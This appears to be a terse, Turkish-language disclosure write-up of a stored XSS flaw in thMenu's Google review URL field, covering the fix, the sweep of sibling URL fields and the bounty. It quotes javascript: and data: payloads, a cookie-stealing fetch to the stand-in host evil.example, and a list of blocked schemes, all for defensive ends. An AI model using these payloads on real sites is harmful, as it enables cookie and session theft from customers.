Google review URL alaninda safeHref yoktu javascript scheme stored XSS — review_url (PR #548 PP C1)

Sanliurfa Eyyubiye 36-yas bagimsiz web pentester Seyma 7-yil 4-yil Garanti BBVA AppSec + 3-yil solo Turk fintech + restoran SaaS. Q1 2026 thMenu open-source repo URL field safeHref coverage parity audit PR #334 referansla restaurants.{wifi_url,logo_url,cover_url} + social_links.url shipped. grep yeni URL field google_reviews_config Pro tier widget review_url Leave us a Google review buton yonlendirme PR #334 safeHref sweep bu tabloyu kapsamamis. Lab repro test thMenu Pro hesap admin paneli Google Reviews review_url javascript:alert('xss') Save 200 OK hicbir scheme validation. Test restoran menu URL Bizi Google da degerlendirin buton tikla alert pop-up javascript URL parse restoran menu origin script execute. Stored XSS customer cookie + session + geolocation attacker-controllable CSP unsafe-inline menu.thmenu.com PR #347 oncesi tarihten execution izin. Saldirgan admin panel erisim review_url javascript:fetch evil.example cookie hasat. data:text/html<script>alert(1)</script> de accepted data scheme safeHref allowlist disinda reject olmasi gerekirken kabul. Seyma writeup security@thmenu.com google_reviews_config.review_url PUT safeHref yok javascript: + data: + file: accepted CVSS 8.4 HIGH operator-side stored XSS customer-side cookie + session theft + cross-restaurant pivot PR #334 sweep kapsamamis sibling coverage gap. Threat model (a) compromised admin javascript: payload customer XSS; (b) malicious sub-operator Pro tier staff menu edit access ayni vector; (c) social engineering Google support spoof review URL boost javascript:fetch yapistir. Engineering 30 dakika reproduce 3 yanlis teori (1) DOMPurify rendering review_url URL field HTML degil DOMPurify HTML context URL scheme validation yapmiyor javascript:alert geceiyor; (2) CSP sikiklastir menu.thmenu.com unsafe-inline customer menu inline styles + scripts gerekli javascript scheme CSP tetiklemez direkt click execute; (3) frontend regex filter client-side bypass curl/Postman direkt PUT server-side validation zorunlu. Dogru pattern safeHref helper http(s) + mailto + tel scheme allowlist + 500 char max-length PR #334 helper google_reviews_config PUT route. Adli analiz apps/web-admin/src/app/api/google-reviews-config/route.ts PUT handler review_url ham DB yazilir menu page <a href={config.review_url}>{button_label}</a> href attribute scheme validation olmadan inject. apps/web-admin/src/lib/sanitize.ts:safeHref PR #334 origin http(s) + mailto + tel scheme javascript: data: file: blob: vbscript: reject. PR #334 PUT restaurants + social_links shipped google_reviews_config unutulmus. Brands.logo_url PR #661 batch XI F3 aynı sweep eksiklik blog #1136 sibling-surface coverage gap pattern. PR #548 batch PP C1 fix Layer 1 safeHref validation google_reviews_config PUT safeHref(review_url, maxLen 500) 422 invalid_review_url. Layer 2 URL field sibling-surface sweep monorepo grep restaurants + social_links PR #334 + google_reviews_config PP C1 + brands.logo_url XI F3 + affiliate_postback_url PR #609 CCC-B + custom_domains.cname_target internal + menu.cover_image_url + products.image_url R2 prefix regex. Layer 3 CI grep guard .github/workflows/ci.yml grep -rn href={.*\.url pattern detection Did you use safeHref warning. Production audit DB scan SELECT review_url NOT LIKE http(s) 3 restoran malformed operator self-test bookmarklet G-Maps deep link real attacker yok. 3 affected personal email + manual cleanup review_url null operator yeniden yapistirmasi. 90-day Cloudflare access + Sentry breadcrumb audit 0 third-party attacker reproduction operator-curiosity-set henuz exploit edilmemis. Seyma €1800 Wise CVSS 8.4 + Hall of Fame + advisory board blog 2.2k Sanliurfa AppSec topluluk Turk SaaS security disclosure benchmark. Cameron Edinburgh Stockbridge 38-yo 9-yil ex-NCC Group paralel disclosure €2000 LinkedIn 5.1k. Pattern customer-side render edilen operator-controlled URL field PUT yazilabilen HER ZAMAN safeHref http(s) + mailto + tel allowlist + 500 char max + javascript:/data:/file:/blob:/vbscript: explicit reject. Sibling sweep canonical (a) safeHref helper application; (b) DB schema TEXT NOT NULL DEFAULT veya nullable; (c) PUT validation + 422; (d) render-side defensive double-check; (e) CI grep guard pattern. Implementation URL field migration PR review safeHref sweep checkbox + tum PUT safeHref + frontend form defensive + render-side fallback + production audit existing data scan manual cleanup + CI grep guard + PR template checkbox. PR #548 referans.

İlgili makaleler